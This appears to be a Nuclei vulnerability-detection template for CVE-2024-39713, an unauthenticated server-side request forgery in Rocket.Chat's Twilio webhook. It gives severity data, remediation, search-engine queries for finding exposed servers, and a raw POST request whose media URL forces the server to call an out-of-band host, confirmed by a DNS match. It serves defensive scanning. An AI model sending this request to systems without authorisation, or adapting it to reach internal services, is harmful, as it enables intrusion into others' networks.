id: CVE-2024-39713 info: name: Rocket.Chat - Server-Side Request Forgery (SSRF) author: iamnoooob,rootxharsh,pdresearch severity: high description: | A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1. impact: | Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services. remediation: | Update Rocket.Chat to version 6.10.1 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-39713 - https://hackerone.com/reports/1886954 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2024-39713 cwe-id: CWE-918 epss-score: 0.90057 epss-percentile: 0.99602 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev,vuln http: - raw: - | POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "From": "5551123456782", "To": "5551987654323", "Body": "SMS message", "NumMedia": 1, "MediaUrl0":"http://{{interactsh-url}}", "MediaContentType0":"application/json" } matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: content_type words: - "text/xml" - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" # digest: 490a004630440220687b84caa8b9e5a35c5d7ab90daae623cdcbca106577fd0cedce29245ca11fa2022023242cc18406972797a431a0bcc87efd8bbf79726cf045cf31f889cca9f9a477:922c64590222798bb761d5b6d8e72950